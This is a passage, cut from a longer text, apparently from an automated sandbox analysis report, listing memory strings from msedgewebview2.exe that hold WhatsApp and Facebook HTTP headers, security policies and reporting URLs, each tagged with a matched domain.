'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://
                  Source: msedgewebview2.exe, 0000001D.00000002.3694357351.00002DDC003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 200vary:Accept-Encodingcontent-encoding:brcontent-type:application/javascript; charset=UTF-8reporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:same-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:same-origin-allow-popups;report-to="coop_report"pragma:no-cachecache-control:no-cacheexpires:Sat, 01 Jan 2000 00:00:00 GMTx-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://
                  Source: msedgewebview2.exe, 0000001D.00000002.3694357351.00002DDC003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 200vary:Accept-Encodingcontent-encoding:brcontent-type:application/javascript; charset=UTF-8reporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:same-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:same-origin-allow-popups;report-to="coop_report"pragma:no-cachecache-control:no-cacheexpires:Sat, 01 Jan 2000 00:00:00 GMTx-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://
                  Source: msedgewebview2.exe, 0000001D.00000002.3694357351.00002DDC003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 200vary:Accept-Encodingcontent-encoding:brcontent-type:application/javascript; charset=UTF-8reporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:same-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:same-origin-allow-popups;report-to="coop_report"pragma:no-cachecache-control:no-cacheexpires:Sat, 01 Jan 2000 00:00:00 GMTx-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://
                  Source: msedgewebview2.exe, 00000020.00000002.3647474243.00001B4400130000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000002.3658870464.00001B44003C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.facebook.com/browser_reporting/coep/?minimize=0 equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000002.3658870464.00001B44003C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.facebook.com/browser_reporting/coep/?minimize=05L,X equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 0000001D.00000002.3699087294.00002DDC007D4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3710111145.00002DDC01064000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 0000001D.00000002.3710111145.00002DDC01064000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.comU equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 0000001D.00000003.2564433283.00002DDC01128000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564262880.00002DDC00C70000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2566414130.00002DDC011D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.comc equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 0000001D.00000003.2564433283.00002DDC01128000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564262880.00002DDC00C70000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2566414130.00002DDC011D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.comc['self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 0000001D.00000002.3699087294.00002DDC007D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.comw\ equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000003.2424379925.00001B440043C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2417800119.00001B4400438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000026.00000003.2426739799.00004B1800AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 0000001D.00000002.3710183119.00002DDC01074000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564433283.00002DDC01128000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564262880.00002DDC00C70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 'self' data: blob: https://www.youtube.com/embed/ equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 0000001D.00000003.2564433283.00002DDC01128000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564262880.00002DDC00C70000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2566414130.00002DDC011D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 'self' data: blob:g_data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net91'self' data: blob: https://www.youtube.com/embed/ equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000003.2479218149.00001B44005E8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2394439778.00001B44005E8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2568526081.00001B44005E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 0000001D.00000003.2366973993.00002DDC01128000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: -inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.comc equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 0000001D.00000003.2366973993.00002DDC01128000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: -inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.comc['self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 0000001D.00000002.3715011612.00002DDC017E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: -www.facebook.com equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 0000001D.00000003.2366973993.00002DDC01128000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: .net https://maps.googleapis.com https://www.youtube.comc equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 0000001D.00000003.2366973993.00002DDC01128000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: .net https://maps.googleapis.com https://www.youtube.comc['self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000003.2568526081.00001B44005E8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3647474243.00001B4400130000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: //*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000003.2398346870.00001B440046E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 00content-encodingbrcontent-typeapplication/javascript; charset=UTF-8varyAccept-Encoding, RefererAccept-Encodingreporting-endpointscoop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policyforce-load-at-toppermissions-policyaccelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policycross-origincross-origin-embedder-policy-report-onlyrequire-corp;report-to="coep_report"cross-origin-opener-policyunsafe-none;report-to="coop_report"pragmapubliccache-controlmax-age=31449600expiresSun, 09 Mar 2025 16:18:00 +0000x-content-type-optionsnosniffx-xss-protection0content-security-policyframe-ancestors 'self'; equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2398346870.00001B4400468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 00content-encodingbrcontent-typetext/css;charset=utf-8varyAccept-Encoding, RefererAccept-Encodingreporting-endpointscoop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policyforce-load-at-toppermissions-policyaccelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policycross-origincross-origin-embedder-policy-report-onlyrequire-corp;report-to="coep_report"cross-origin-opener-policyunsafe-none;report-to="coop_report"pragmapubliccache-controlmax-age=31449600expiresSat, 08 Mar 2025 22:48:22 +0000x-content-type-optionsnosniffx-xss-protection0content-security-policyframe-ancestors 'self'; equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2552003948.00001B4400468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 00varyAccept-Encodingcontent-encodingbrcontent-typeapplication/json; charset=utf-8x-robots-tagnoindexreporting-endpointscoop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policyforce-load-at-toppermissions-policyaccelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policysame-origincross-origin-embedder-policy-report-onlyrequire-corp;report-to="coep_report"cross-origin-opener-policysame-origin-allow-popups;report-to="coop_report"pragmano-cachecache-controlprivate, no-cache, no-store, must-revalidateexpiresSat, 01 Jan 2000 00:00:00 GMTx-content-type-optionsnosniffx-xss-protection0content-security-policyframe-ancestors 'self';D equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2395284363.00001B4400444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 9KFtsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2395284363.00001B4400444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 9KFtsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests; equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000003.2395284363.00001B4400444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 9KFtsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;strict-transport-security:max-age=31536000; preload; includeSubDomainsx-fb-debug:rTcT0IxKoJ/tgmIdPxOrLFh9cPorrsnlpD6KBNWDZTu3S5SZfXNhHyzSLN+R5gAbiHXjeD3ccJX3Csx4Qd8UNA==content-length:233729date:Sun, 10 Mar 2024 16:46:10 GMTx-fb-connection-quality:MODERATE; q=0.3, rtt=444, rtx=0, c=146, mss=1232, tbw=293689, tp=258, tpl=0, uplat=1, ullat=-1alt-svc:h3=":443"; ma=86400priority:u=3,i equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2395284363.00001B4400444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 9KFtsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagram.com https://*.fbcdn.net mediastream: *.tenor.co *.tenor.com https://*.giphy.com;child-src 'self' data: blob:;frame-src 'self' data: blob: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;strict-transport-security:max-age=31536000; preload; includeSubDomainsx-fb-debug:rTcT0IxKoJ/tgmIdPxOrLFh9cPorrsnlpD6KBNWDZTu3S5SZfXNhHyzSLN+R5gAbiHXjeD3ccJX3Csx4Qd8UNA==content-length:233729date:Sun, 10 Mar 2024 16:46:10 GMTx-fb-connection-quality:MODERATE; q=0.3, rtt=444, rtx=0, c=146, mss=1232, tbw=293689, tp=258, tpl=0, uplat=1, ullat=-1alt-svc:h3=":443"; ma=86400priority:u=3,i equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000026.00000003.2393511115.00004B180074C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2525156426.00004B180074C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 9www.facebook.com equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000026.00000003.2393511115.00004B180074C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2525156426.00004B180074C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 9www.youtube.com equals www.youtube.com (Youtube)
                  Source: msedgewebview2.exe, 00000020.00000003.2960957834.00001B4400434000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: :\/\/www.facebook.com\/ajax\/bro equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2960957834.00001B4400434000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: :\/\/www.facebook.com\/ajax\/bros equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 00000020.00000003.2676119886.00001B4400378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <4https://www.facebook.com/ajax/browser_error_reports/ equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 0000001D.00000002.3696682799.00002DDC0068C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <@ror_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:same-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:same-origin-allow-popups;report-to="coop_report"pragma:no-cachecache-control:no-cacheexpires:Sat, 01 Jan 2000 00:00:00 GMTx-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 